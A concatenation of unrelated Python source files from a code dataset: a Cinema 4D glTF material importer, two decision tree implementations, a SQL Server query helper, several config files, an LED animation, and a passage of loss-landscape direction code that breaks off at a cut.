self.gltf_textures[material.normal_texture.index].to_c4d_shader()\n mat.SetParameter(c4d.MATERIAL_NORMAL_SHADER, normaltexshader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(normaltexshader)\n\n def set_alpha(self, material, mat):\n if material.alpha_mode not in ('BLEND', 'MASK'):\n mat[c4d.MATERIAL_USE_ALPHA] = 0\n return\n\n mat[c4d.MATERIAL_USE_ALPHA] = 1\n alpha_factor = 1.0\n diffuse_alpha_shader = None\n\n if material.extensions and 'KHR_materials_pbrSpecularGlossiness' in material.extensions:\n pbr_specular = material.extensions['KHR_materials_pbrSpecularGlossiness']\n alpha_factor = pbr_specular['diffuse_factor'][3] if 'diffuse_factor' in pbr_specular else 1.0\n if 'diffuseTexture' in pbr_specular:\n diffuse_alpha_shader = self.gltf_textures[pbr_specular['diffuseTexture']['index']].to_c4d_shader(alpha_only=True)\n\n elif material.pbr_metallic_roughness:\n pbr_metal = material.pbr_metallic_roughness\n if pbr_metal.base_color_texture:\n diffuse_alpha_shader = self.gltf_textures[pbr_metal.base_color_texture.index].to_c4d_shader(alpha_only=True)\n if pbr_metal.base_color_factor:\n alpha_factor = pbr_metal.base_color_factor[3] if pbr_metal.base_color_factor else 1.0\n\n if material.alpha_mode == 'BLEND':\n mat.SetParameter(c4d.MATERIAL_ALPHA_SOFT, True, c4d.DESCFLAGS_SET_NONE)\n if diffuse_alpha_shader:\n mat.SetParameter(c4d.MATERIAL_ALPHA_IMAGEALPHA, True, c4d.DESCFLAGS_SET_NONE)\n\n diffuse_alpha_shader = diffuse_alpha_shader\n alpha_colorizer = c4d.BaseShader(c4d.Xcolorizer)\n alpha_colorizer.SetParameter(c4d.SLA_COLORIZER_TEXTURE, diffuse_alpha_shader, c4d.DESCFLAGS_SET_NONE)\n alpha_colorizer.InsertShader(diffuse_alpha_shader)\n alpha_colorizer.SetParameter(c4d.SLA_COLORIZER_INPUT, c4d.SLA_COLORIZER_INPUT_LUMINANCE, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(c4d.MATERIAL_ALPHA_SHADER, alpha_colorizer, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(alpha_colorizer)\n\n # Apply factor\n alpha_color_from_factor = c4d.Vector(alpha_factor, alpha_factor, alpha_factor)\n self.setGradient(alpha_colorizer, self.COLOR_BLACK, alpha_color_from_factor)\n else:\n mat.SetParameter(c4d.MATERIAL_ALPHA_IMAGEALPHA, False, c4d.DESCFLAGS_SET_NONE)\n alpha_color_shader = c4d.BaseShader(c4d.Xcolor)\n alpha_color_shader.SetParameter(c4d.COLORSHADER_COLOR, self.COLOR_WHITE, c4d.DESCFLAGS_SET_NONE)\n alpha_color_shader.SetParameter(c4d.COLORSHADER_BRIGHTNESS, alpha_factor, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(c4d.MATERIAL_ALPHA_SHADER, alpha_color_shader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(alpha_color_shader)\n\n elif material.alpha_mode == 'MASK': # # Masking without texture doesn't really make sense\n if diffuse_alpha_shader:\n mat.InsertShader(diffuse_alpha_shader)\n mat.SetParameter(c4d.MATERIAL_ALPHA_SHADER, diffuse_alpha_shader, c4d.DESCFLAGS_SET_NONE)\n mat.SetParameter(c4d.MATERIAL_ALPHA_COLOR, self.COLOR_BLACK, c4d.DESCFLAGS_SET_NONE)\n cutoff = max(material.alpha_cutoff, 0.99) # a full white color makes everything fully transparent\n delta_color = c4d.Vector(cutoff, cutoff, cutoff)\n mat.SetParameter(c4d.MATERIAL_ALPHA_DELTA, delta_color, c4d.DESCFLAGS_SET_NONE)\n\n def set_emissive(self, material, mat):\n if not material.emissive_texture and not material.emissive_factor:\n return\n\n has_valid_emission = False\n\n if material.emissive_texture:\n emitShader = self.gltf_textures[material.emissive_texture.index].to_c4d_shader()\n mat.SetParameter(c4d.MATERIAL_LUMINANCE_SHADER, emitShader, c4d.DESCFLAGS_SET_NONE)\n mat.InsertShader(emitShader)\n has_valid_emission = True\n\n if 
material.emissive_factor:\n emit_factor = material.emissive_factor\n emit_color = c4d.Vector(emit_factor[0], emit_factor[1], emit_factor[2])\n mat.SetParameter(c4d.MATERIAL_LUMINANCE_COLOR, emit_color, c4d.DESCFLAGS_SET_NONE)\n if emit_factor[0] != 0.0 and emit_factor[1] != 0.0 and emit_factor[2] != 0.0:\n has_valid_emission = True\n\n if has_valid_emission:\n mat[c4d.MATERIAL_USE_LUMINANCE] = 1\n\n def create_material(self, name):\n mat = c4d.Material()\n mat.SetName(name)\n mat[c4d.MATERIAL_USE_ALPHA] = False\n mat[c4d.MATERIAL_USE_COLOR] = False\n mat[c4d.MATERIAL_USE_LUMINANCE] = False\n mat[c4d.MATERIAL_USE_NORMAL] = False\n mat[c4d.MATERIAL_USE_SPECULAR] = False\n mat[c4d.MATERIAL_USE_TRANSPARENCY] = False\n\n return mat\n\n def import_gltf_materials(self, gltf):\n ''' Might be replaced by imported c4d mat'''\n # Following tricks from https://forum.allegorithmic.com/index.php?topic=9757.0#msg85512\n materials = gltf.data.materials\n if not materials:\n return None\n\n imported_materials = {}\n for index, material in enumerate(materials):\n mat = self.create_material(material.name)\n\n if material.extensions and 'KHR_materials_pbrSpecularGlossiness' in material.extensions:\n mat[c4d.MATERIAL_USE_COLOR] = 1\n mat.RemoveReflectionAllLayers()\n spec_gloss = material.extensions['KHR_materials_pbrSpecularGlossiness']\n self.make_specular_diffuse(spec_gloss, mat)\n self.make_specular_layer(spec_gloss, mat)\n\n else:\n # Turn off Color\n mat[c4d.MATERIAL_USE_COLOR] = 0\n mat.RemoveReflectionAllLayers()\n\n pbr_metal = material.pbr_metallic_roughness\n if pbr_metal:\n self.make_diffuse_layer(pbr_metal, mat)\n self.make_metallic_reflectance_layer(pbr_metal, mat)\n self.make_dielectric_reflectance_layer(pbr_metal, mat)\n\n self.set_alpha(material, mat)\n self.set_normal_map(material, mat)\n self.set_emissive(material, mat)\n\n imported_materials[index] = mat\n self.progress_callback(\"Importing materials\", index + 1, len(materials))\n\n for index in imported_materials:\n c4d.documents.GetActiveDocument().InsertMaterial(imported_materials[index])\n\n return imported_materials\n\n def import_gltf_textures(self, gltf):\n dest_textures_path = self.get_texture_path()\n if not os.path.exists(dest_textures_path):\n os.mkdir(dest_textures_path)\n\n self.gltf_textures = []\n if gltf.data.textures is None:\n return\n\n for texture in gltf.data.textures:\n # 1. 
Copy texture to project directory\n image = gltf.data.images[texture.source]\n fullpath = os.path.join(self.model_dir, image.uri)\n if not os.path.exists(fullpath):\n print('Texture not found')\n return\n\n if not os.path.exists(dest_textures_path):\n os.mkdir(dest_textures_path)\n\n final_texture_path = os.path.join(dest_textures_path, '{}_{}'.format(texture.source, os.path.basename(fullpath)))\n if not os.path.exists(final_texture_path):\n shutil.copy(fullpath, final_texture_path)\n\n sampler = gltf.data.samplers[texture.sampler]\n texture = TextureWrapper(final_texture_path, sampler)\n\n # Copy texture to project textures directory\n self.gltf_textures.append(texture) # TODO use list instead\n self.progress_callback(\"Importing textures\", len(self.gltf_textures), len(gltf.data.images))\n\n print('Imported {} textures'.format(len(self.gltf_textures)))\n","sub_path":"sketchfab/import_gltf.py","file_name":"import_gltf.py","file_ext":"py","file_size_in_byte":53289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"384363761","text":"\"\"\"Tree structure generators in classicML.\"\"\"\nimport pandas as pd\n\nfrom classicML.backend.training import get_criterion\n\n\nclass _TreeNode(object):\n \"\"\"A node of the tree.\n\n Attributes:\n num_of_leaves: int, default=None,\n the number of leaf nodes; None means there are no leaf nodes, i.e. the node itself is a leaf.\n leaf: bool, default=False,\n whether this node is a leaf.\n height: int, default=-1,\n the height of the current node.\n category: str, default='',\n the category represented by the current node.\n feature_name: str, default='',\n the attribute the current node splits on.\n feature_index: int, default=None,\n the index of the attribute the current node splits on.\n purity: float, default=None,\n the purity of the current node.\n continuous: bool, default=False,\n whether the attribute is continuous.\n subtree: dict, default={},\n the branches of the attribute, i.e. the subtrees.\n dividing_point: float, default=None,\n the dividing point when the current node splits on a continuous value.\n \"\"\"\n def __init__(self):\n self.num_of_leaves = None\n self.leaf = False\n self.height = -1\n self.category = ''\n self.feature_name = ''\n self.feature_index = None\n self.purity = None\n self.continuous = False\n self.subtree = dict()\n self.dividing_point = None\n\n def reset(self, category):\n \"\"\"Reset the node.\n\n Arguments:\n category: str, the category represented by the current node.\n \"\"\"\n self.num_of_leaves = 1\n self.height = 0\n self.category = category\n self.leaf = True\n self.feature_name = ''\n self.feature_index = None\n self.purity = None\n self.continuous = False\n self.subtree = dict()\n self.dividing_point = None\n\n\nclass TreeGenerator(object):\n \"\"\"Base class for tree generators.\n\n Attributes:\n name: str, the name of the generator.\n criterion: {'gain', 'gini', 'entropy'}, default='gain',\n the splitting criterion for decision tree learning.\n \"\"\"\n def __init__(self, name=None, criterion=None):\n \"\"\"Initialize the generator.\n\n Arguments:\n name: str, the name of the generator.\n criterion: {'gain', 'gini', 'entropy'}, default='gain',\n the splitting criterion for decision tree learning.\n \"\"\"\n super(TreeGenerator, self).__init__()\n self.name = name\n self.criterion = get_criterion(criterion)\n\n def __call__(self, *args, **kwargs):\n \"\"\"Invoke the implementation.\"\"\"\n return self.tree_generate(*args, **kwargs)\n\n def tree_generate(self, *args, **kwargs):\n \"\"\"The tree-generation implementation.\"\"\"\n raise NotImplementedError\n\n\nclass DecisionTreeGenerator(TreeGenerator):\n \"\"\"Decision tree generator.\n\n Attributes:\n _x: pandas.DataFrame,\n the raw, untrained feature data.\n Keeping a copy of the raw data inevitably doubles the memory use, but after splitting on the optimal attribute, branches (child nodes) should be generated for every attribute value that has appeared.\n \"\"\"\n def __init__(self, name='decision_tree_generator', criterion=None):\n super(DecisionTreeGenerator, self).__init__(name=name,\n criterion=criterion)\n\n self._x = None\n\n def tree_generate(self, x, y):\n \"\"\"Generate the decision tree.\n\n Arguments:\n x: pandas.DataFrame, the feature data.\n y: pandas.DataFrame, the labels.\n\n Returns:\n A DecisionTreeClassifier instance.\n \"\"\"\n 
decision_tree = _TreeNode()\n decision_tree.num_of_leaves = 0\n\n # All samples belong to the same class.\n if y.nunique() == 1:\n decision_tree.num_of_leaves += 1\n decision_tree.leaf = True\n decision_tree.height = 0\n decision_tree.category = y.values[0]\n\n return decision_tree\n\n # All attributes have been exhausted.\n if x.empty:\n decision_tree.num_of_leaves += 1\n decision_tree.leaf = True\n decision_tree.height = 0\n # TODO(Steve R. Sun, tag:code): value_counts does not sort in a fixed order when two values occur equally often,\n # but returns them in arbitrary order, so the generated tree may differ between runs. This function should be rewritten.\n decision_tree.category = pd.value_counts(y).index[0]\n\n return decision_tree\n\n # Choose the optimal split.\n feature_name, list_of_purity = self.criterion.optimal_division(x, y)\n\n decision_tree.feature_name = feature_name\n decision_tree.feature_index = list(self._x.columns).index(decision_tree.feature_name)\n current_feature_values = self._x.loc[:, decision_tree.feature_name]\n decision_tree.purity = list_of_purity[0]\n\n if len(list_of_purity) != 1:\n decision_tree.continuous = True\n decision_tree.dividing_point = list_of_purity[1]\n\n # Handle continuous values with bi-partition.\n greater_part = '>= {:.3f}'.format(decision_tree.dividing_point)\n less_part = '< {:.3f}'.format(decision_tree.dividing_point)\n decision_tree.subtree[greater_part] = self.tree_generate(\n x.loc[current_feature_values >= decision_tree.dividing_point],\n y.loc[current_feature_values >= decision_tree.dividing_point])\n decision_tree.subtree[less_part] = self.tree_generate(\n x.loc[current_feature_values < decision_tree.dividing_point],\n y.loc[current_feature_values < decision_tree.dividing_point])\n\n decision_tree.num_of_leaves += (decision_tree.subtree[greater_part].num_of_leaves\n + decision_tree.subtree[less_part].num_of_leaves)\n decision_tree.height = (decision_tree.subtree[greater_part].height\n + decision_tree.subtree[less_part].height) + 1\n else:\n decision_tree.continuous = False\n\n feature_values = pd.unique(current_feature_values)\n sub_x = x.drop(decision_tree.feature_name, axis=1) # The optimal attribute counts as used up.\n\n max_height = -1\n # Generate a branch for each attribute value.\n for feature_value in feature_values:\n if y[current_feature_values == feature_value].empty:\n decision_tree.subtree[feature_value] = self.tree_generate(\n sub_x.loc[current_feature_values == feature_value],\n y) # If empty, the label should in theory be the most frequent one in the data set, but that is awkward to implement recursively, so the parent node's labels are passed in here.\n else:\n decision_tree.subtree[feature_value] = self.tree_generate(\n sub_x.loc[current_feature_values == feature_value],\n y.loc[current_feature_values == feature_value])\n\n # Update the height of the subtree.\n if decision_tree.subtree[feature_value].height > max_height:\n max_height = decision_tree.subtree[feature_value].height\n\n decision_tree.num_of_leaves += decision_tree.subtree[feature_value].num_of_leaves\n\n decision_tree.height = max_height + 1\n\n return decision_tree","sub_path":"classicML/backend/python/tree/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"158547500","text":"import pyodbc \nimport pandas as pd\n\ndef query_wa(pwd, table,\n\tserver = 'BHICALWA02,50900', database = 'WA_CAL_CALGARY_Defn',\n\tuid = 'jordwil',\n\t\t\t):\n\t'''\n\tQueries WellArchitect database:\n\tReturns pandas dataframe of the supplied table\n\n\tserver: default = BHICALWA02,50900\n\t\n\tdatabase: default = WA_CAL_CALGARY_Defn\n\n\tuid: default = jordwil \n\trequires user 4-3-1\n\t\n\tRequired\n\tpwd: default = None\n\ttable: default = None\n\t'''\n\tcnxn = pyodbc.connect(\"Driver={SQL Server Native Client 
11.0};\"\n\t\t\t\t\t\t\t\"Server=\"+str(server)+\";\"\n\t\t\t\t\t\t\t\"Database=\"+str(database)+\";\"\n\t\t\t\t\t\t\t\"trusted_connection=yes;\"\n\t\t\t\t\t\t\t\"uid=\"+str(uid)+\";pwd=\"+str(pwd)+\";\"\n\t\t\t\t\t\t)\n\t#df = pd.read_sql_query('select * from table', cnxn)\n\tcrsr = cnxn.cursor()\n\tfor table_info in crsr.tables(tableType='TABLE'):\n\t\tprint(table_info.table_name)\n\t\t\n\tquery = \"SELECT * FROM [\"+str(table)+\"]\"\n\tdf = pd.read_sql(query, cnxn)\n\tcnxn.close()\n\n\treturn df\n\n### ### ### ###\ndef main():\n\treturn ''\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"wellarchitect/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"517021949","text":"import pandas as pd\r\nimport numpy as np\r\nimport random\r\n\r\nsaving = []\r\n\r\n\r\ndef Ent(data_set):\r\n    \"\"\"\r\n    Compute the (Shannon) entropy of a sample set.\r\n    :param data_set: a group of samples, n*(features; labels) list\r\n    :return: entropy of this group, float\r\n    \"\"\"\r\n    classify = []  # labels\r\n    number = []  # count per label\r\n    length = 0\r\n    for i in range(len(data_set)):\r\n        if data_set[i][-1] in classify:\r\n            idx = classify.index(data_set[i][-1])\r\n            number[idx] = number[idx] + 1\r\n        else:\r\n            classify.append(data_set[i][-1])\r\n            number.append(1)\r\n            length = length + 1\r\n\r\n    entropy = 0\r\n    for i in range(length):\r\n        pro = number[i] / len(data_set)\r\n        if pro != 0:  # '!=' rather than 'is not': identity tests on floats are always True\r\n            entropy = entropy + (-pro) * np.log2(pro)\r\n\r\n    return entropy\r\n\r\n\r\ndef info_gain(data_origin, data_list):\r\n    \"\"\"\r\n    Compute the information gain of a split.\r\n    :param data_origin: the original data group, array\r\n    :param data_list: the n groups after the split, n*(features; labels)*n1 list of arrays\r\n    :return: information gain of the split, float\r\n    \"\"\"\r\n    # NOTE: standard ID3 weights each subset's entropy by |subset|/|total|; the unweighted\r\n    # sum kept here reproduces the original behaviour.\r\n    after_entropy = 0\r\n    for item in iter(data_list):\r\n        after_entropy = after_entropy + Ent(item)\r\n\r\n    return Ent(data_origin) - after_entropy\r\n\r\n\r\ndef data_load(filename='iris.csv'):\r\n    \"\"\"\r\n    Read the data in and convert it to a list of rows.\r\n    :param filename:\r\n    :return:\r\n    \"\"\"\r\n    csv_er = pd.read_csv(filename)\r\n    val = csv_er.values\r\n    DataList = []\r\n    for i in range(val.shape[0]):\r\n        DataList.append(val[i])\r\n    return DataList\r\n\r\n\r\ndef select_boundary(iris, num_features):\r\n    \"\"\"\r\n    Find the best binary split point for each continuous feature.\r\n    :param num_features: indices of the features to consider\r\n    :param iris: the continuous-valued samples waiting to be split, list\r\n    :return: per-feature [gain, bound] pairs\r\n    \"\"\"\r\n    boundary = []\r\n    for i in num_features:\r\n        # sort by feature i; midpoints of consecutive values are the candidate bounds\r\n        iris.sort(key=lambda d: d[i])\r\n        gain = 0\r\n        bound = -1\r\n        for j in range(len(iris) - 1):\r\n            middle = (iris[j][i] + iris[j + 1][i]) / 2\r\n            list1 = []\r\n            list2 = []\r\n            for item in iris:\r\n                if item[i] >= middle:\r\n                    list1.append(item)\r\n                else:\r\n                    list2.append(item)\r\n            cur_gain = info_gain(iris, [list1, list2])  # compute once instead of twice\r\n            if cur_gain >= gain:\r\n                gain = cur_gain\r\n                bound = middle\r\n        boundary.append([gain, bound])\r\n    return boundary\r\n\r\n\r\ndef is_same_cat(processed_data):\r\n    \"\"\"\r\n    :param processed_data: the processed data, list\r\n    :return: True or False\r\n    \"\"\"\r\n    if not processed_data:\r\n        return False\r\n    else:\r\n        compare = processed_data[0][-1]\r\n        for item in processed_data:\r\n            if item[-1] != compare:  # value comparison; 'is not' compared object identity\r\n                return False\r\n        return True\r\n\r\n\r\ndef get_decision_tree(loaded_data, layer, parent=None, to_be_split=None):\r\n    if to_be_split is None:\r\n        to_be_split = [0, 1, 2, 3]\r\n    if not is_same_cat(loaded_data) and layer < 4:\r\n        criterion = select_boundary(loaded_data, to_be_split)\r\n        # pick the max criterion as the bound\r\n        # delete the index of this criterion in [0 1 2 3]\r\n        idx = 
criterion.index(max(criterion))\r\n        list1 = []\r\n        list2 = []\r\n        for item in loaded_data:\r\n            if item[to_be_split[idx]] >= criterion[idx][1]:\r\n                list1.append(item)\r\n            else:\r\n                list2.append(item)\r\n        if list1 and list2:  # both splits must be non-empty; 'bool(a) and bool(b) is True' parsed oddly\r\n            print(\r\n                \"Decision layer:{} from:{} class1:{} class2:{} criterion:{} threshold:{}\".format(\r\n                    layer, parent, len(list1), len(list2), to_be_split[idx], criterion[idx][1]))\r\n            saving.append([layer, parent, to_be_split[idx], criterion[idx][1], None, None])\r\n            to_be_split.pop(idx)\r\n            temp1 = []\r\n            temp2 = []\r\n            for item in to_be_split:\r\n                temp1.append(item)\r\n                temp2.append(item)\r\n            get_decision_tree(list1, layer + 1, parent='class1', to_be_split=temp1)\r\n            get_decision_tree(list2, layer + 1, parent='class2', to_be_split=temp2)\r\n            return\r\n        else:\r\n            \"\"\"\r\n            select the most frequent label as the category\r\n            \"\"\"\r\n            cat = []\r\n            times = []\r\n            for item in loaded_data:\r\n                if item[-1] in cat:\r\n                    times[cat.index(item[-1])] = times[cat.index(item[-1])] + 1\r\n                else:\r\n                    cat.append(item[-1])\r\n                    times.append(1)\r\n            position = times.index(max(times))\r\n            print(\"In Decision layer:{} class:{} category:{}\".format(layer - 1, parent, cat[position]))\r\n            for item in saving:\r\n                if item[0] == layer - 1:\r\n                    if parent == 'class1':  # compare strings by value, not identity\r\n                        item[4] = cat[position]\r\n                    elif parent == 'class2':\r\n                        item[5] = cat[position]\r\n            return\r\n\r\n    else:\r\n        if layer >= 4:\r\n            pass\r\n        else:\r\n            print(\"In Decision layer:{} class:{} category:{}\".format(layer - 1, parent, loaded_data[0][-1]))\r\n            for item in saving:\r\n                if item[0] == layer - 1:\r\n                    if parent == 'class1':\r\n                        item[4] = loaded_data[0][-1]\r\n                    elif parent == 'class2':\r\n                        item[5] = loaded_data[0][-1]\r\n            return\r\n\r\n\r\ndef model(one_data, critic):\r\n    i = 0\r\n    path = [None]\r\n    label = None\r\n    for item in critic:\r\n        if item[0] == i and path[i] == item[1]:\r\n            if one_data[item[2]] >= item[3]:\r\n                path.append('class1')\r\n                if item[4] is not None:\r\n                    label = item[4]\r\n            else:\r\n                path.append('class2')\r\n                if item[5] is not None:\r\n                    label = item[5]\r\n            i = i + 1\r\n    if label == one_data[-1]:  # 'is' compared object identity here and could misreport accuracy\r\n        return 1\r\n    else:\r\n        return 0\r\n\r\n\r\ndef validation(test_data, critic):\r\n    acc = 0\r\n    for item in test_data:\r\n        acc = acc + model(item, critic)\r\n    return acc/len(test_data) * 100\r\n\r\n\r\nif __name__ == '__main__':\r\n    data = data_load(filename='iris.csv')\r\n    train = []\r\n    for i in range(100):\r\n        x = random.randint(0, len(data)-1)\r\n        train.append(data[x])\r\n        data.pop(x)\r\n    get_decision_tree(train, layer=0)\r\n    print(saving)\r\n    print('Test accuracy is {}%'.format(validation(data, critic=saving)))\r\n","sub_path":"decision tree.py","file_name":"decision tree.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"430603271","text":"\n\n# class header\nclass _MAGIC():\n\tdef __init__(self):\n\t\tself.name = \"MAGIC\"\n\t\tself.definitions = [u'with special powers: ', u'happening in an unusual or unexpected way, or easily or quickly: ']\n\n\t\tself.parents = []\n\t\tself.children = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn 
self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_magic.py","file_name":"_magic.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60249765","text":"import os\n\nHOST = os.getenv('HOST', '192.168.71.149')\nPORT = os.getenv('PORT', 19530)\nDIMENSION = os.getenv('DIMENSION', 512)\nDEFAULT_TABLE = os.getenv(\"DEFAULT_TABLE\", \"milvus\")\nUPLOAD_PATH = \"/data/pic-server/search_for_pictures/tmp\"\nREDIS_NAME = \"HCLC_IMG_COLLECTION\"\nREDIS_URI = os.getenv('REDIS_URI', '127.0.0.1')\nREDIS_PORT = os.getenv(\"REDIS_PORT\", 6379)\nIMG_TYPE = [\"jpg\", \"png\", \"jpeg\"]\nTHREAD_NUM = os.getenv(\"THREAD_NUM\", 20)\nMONGODB_COLLECTION_NAME = 'HCLC'\nMONGODB_URI = os.getenv('MONGODB_URI', '192.168.70.198')\nMONGODB_PORT = os.getenv('MONGODB_PORT', 27017)\n\n","sub_path":"common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64715161","text":"from HelperFunctions import*\nfrom triangle import*\n \t\t\nclass Bullet(object):\n\tdef __init__(self, trimodel, color, pos, dir):\n\t\tself.tri = trimodel\n\t\tself.color = color\n\t\tself.pos = pos\n\t\tself.dir = dir\n\n\tdef draw_bullet(self):\n\t\tself.tri.set_cell(self.pos, wheel(self.color))\n\t\n\tdef move_bullet(self):\t\t\t\n\t\tnewspot = tri_in_direction(self.pos, self.dir, 1)\t# Where is the bullet going?\n\t\tif self.tri.cell_exists(newspot):\t# Is new spot off the board?\n\t\t\tself.pos = newspot\t# On board. Update spot\n\t\t\tself.draw_bullet()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\t# Off board. Kill.\n\t\t\t\nclass Spinner(object):\n\tdef __init__(self, trimodel, pos):\n\t\tself.tri = trimodel\n\t\tself.pos = pos\n\t\tself.start = pos\n\t\tself.time = 0\n\n\tdef move_spinner(self):\n\t\tnewspot = tri_in_direction(self.pos, randDir(), 2)\n\t\tif self.tri.cell_exists(newspot):\n\t\t\tself.pos = newspot\n\t\tif self.time > 100:\n\t\t\tself.time = 0\n\t\t\tself.pos = self.start\n\n\tdef draw_spinner(self, color):\n\t\tself.time += 1\n\t\tfor size in range(4):\n\t\t\tring_cells = get_ring(self.pos, size)\n\t\t\tnum_cells = len(ring_cells)\n\t\t\tfor c in range(num_cells):\n\t\t\t\tif self.tri.cell_exists(ring_cells[c]):\n\t\t\t\t\tgradient = 1 - (abs(c - (self.time % num_cells))/(float)(num_cells-1))\n\t\t\t\t\t#self.tri.set_cell(ring_cells[c],gradient_wheel(color, gradient))\n\t\t\t\t\tself.tri.set_cells(self.tri.mirror_coords(ring_cells[c]),\n\t\t\t\t\t\tgradient_wheel(color, gradient))\n\t\t\t\t\nclass Spinners(object):\n\tdef __init__(self, trimodel):\n\t\tself.name = \"Spinners\" \n\t\tself.tri = trimodel\n\t\tself.spinners = []\t# List that holds Spinner objects\n\t\tself.bullets = []\t# List that holds Bullets objects\n\t\tself.speed = 0.05\n\t\tself.background = randColor()\n\t\tself.spincolor = randColor()\n\t\t \n\tdef next_frame(self):\n\n\t\tfor center in all_centers():\n\t\t\tnewspinner = Spinner(self.tri, center)\n\t\t\tself.spinners.append(newspinner)\n\n\t\twhile (True):\n\t\t\t\n\t\t\t# Randomly fire a bullet\n\t\t\t\n\t\t\tself.draw_background()\n\t\t\t\n\t\t\t# Draw the bullets\n\t\t\t\t\n\t\t\tfor b in self.bullets:\n\t\t\t\tif b.move_bullet() == False:\t# bullet has moved off the board\n\t\t\t\t\tself.bullets.remove(b)\t# kill the bullet\n\t\t\t\n\t\t\t# Random move the spin centers\n\t\t\t\n\t\t\tfor s in self.spinners:\n\t\t\t\ts.draw_spinner(self.spincolor)\n\t\t\t\tif 
oneIn(5):\n\t\t\t\t\ts.move_spinner()\n\t\t\t\tif oneIn(5):\n\t\t\t\t\tnewbullet = Bullet(self.tri, self.spincolor, s.pos, randDir())\n\t\t\t\t\tself.bullets.append(newbullet)\n\t\t\t\n\t\t\t# Change the colors\n\t\t\t\n\t\t\tself.background = (self.background + 5) % maxColor\t\t\t\t\t\n\t\t\t\n\t\t\tself.spincolor = (maxColor + self.spincolor - 10) % maxColor\n\t\t\t\n\t\t\tyield self.speed\n\t\n\t# Draw the background - concentric triangles of decreasing intensities\n\t\n\tdef draw_background(self):\n\t\tfor i in range (12,0,-1): # total number of triangles\n\t\t\tfor corner in all_left_corners():\n\t\t\t\tself.tri.set_cells(tri_shape(corner, i),\n\t\t\t\t\t\t\tgradient_wheel(self.background, 1-(i/12.0)))\n","sub_path":"shows/Spinners.py","file_name":"Spinners.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"564278819","text":"import os\n\n# set debug to true for development\nDEBUG = True\n\n# App directory\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# App name\nAPP_NAME = \"Python Flask Boilerplate\"\n\n# Threads per core\nTHREADS_PER_PAGE = 2\n\n# Enable protection agains *Cross-site Request Forgery (CSRF)*\nCSRF_ENABLED = True\n\n# Use a secure, unique and absolutely secret key for\n# signing the data.\nCSRF_SESSION_KEY = \"code\"\n\n# Secret key for signing cookies\nSECRET_KEY = \"code\"\n\nALLOWED_HEADERS = ['Access-Token, X-Requested-With, Content-Type, Accept']\nALLOWED_ORIGINS = '*'\nALLOWED_METHODS = ['GET', 'HEAD', 'POST', 'OPTIONS', 'PUT', 'PATCH', 'DELETE']\n\n# Environment - dev, stage, prod\nAPP_ENV = 'dev'\n\n# Default values\nPAGE_LIMIT = 20\n\n# Error messages\nERROR = {\n 'no_results': 'No results found',\n 'permission': 'You do not have permission to do this action'\n}\n\nprint(\" * Loading config for \" + APP_NAME)\n","sub_path":"instance/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440301958","text":"import torch\nfrom torch import Tensor\n\nfrom logging import debug\nimport os\nimport sys\nfrom warnings import resetwarnings\nfrom torch._C import device\n\nfrom torch.functional import Tensor\nfrom .utils import read_list, write_list\nimport h5py\n\n# import torch.distributed as dist\n\nimport numpy as np\nfrom . 
import projection as proj, scheduler\nimport torch.multiprocessing as mp\nimport time\nfrom functools import partial\nfrom utils import mpi4pytorch as mpi\n\ndef get_weights_as_list(net):\n \"\"\" Extract parameters from net, and return a list of tensors\"\"\"\n return [p.data for p in net.parameters()]\n\ndef get_random_weights(weights):\n \"\"\"\n Produce a random direction that is a list of random Gaussian tensors\n with the same shape as the network's weights, so one direction entry per weight.\n \"\"\"\n return [torch.randn(w.size()) for w in weights]\n\nclass Direction:\n ################################################################################\n # Normalization Functions\n ################################################################################\n @staticmethod\n def _normalize(direction: Tensor, weights: Tensor, norm='filter'):\n \"\"\"\n Rescale the direction so that it has similar norm as their corresponding\n model in different levels.\n\n Args:\n direction (tensor): a variables of the random direction for one layer\n weights (tensor): a variable of the original model for one layer\n norm: normalization method, 'filter' | 'layer' | 'weight'\n \"\"\"\n if norm == 'filter':\n # Rescale the filters (weights in group) in 'direction' so that each\n # filter has the same norm as its corresponding filter in 'weights'.\n assert direction.dim() == 3 and weights.dim() == 3\n sc = weights.norm(dim=(-1, -2), keepdim=True)/(direction.norm(dim=(-1, -2), keepdim=True) + 1e-10)\n direction.mul_(sc)\n elif norm == 'layer':\n # Rescale the layer variables in the direction so that each layer has\n # the same norm as the layer variables in weights.\n direction.mul_(weights.norm()/direction.norm())\n elif norm == 'weight':\n # Rescale the entries in the direction so that each entry has the same\n # scale as the corresponding weight.\n direction.mul_(weights)\n elif norm == 'dfilter':\n # Rescale the entries in the direction so that each filter direction\n # has the unit norm.\n dnorm = direction.view(direction.size(0), -1).norm(dim=-1).view(direction.size())\n direction.div_(dnorm + 1e-10)\n elif norm == 'dlayer':\n # Rescale the entries in the direction so that 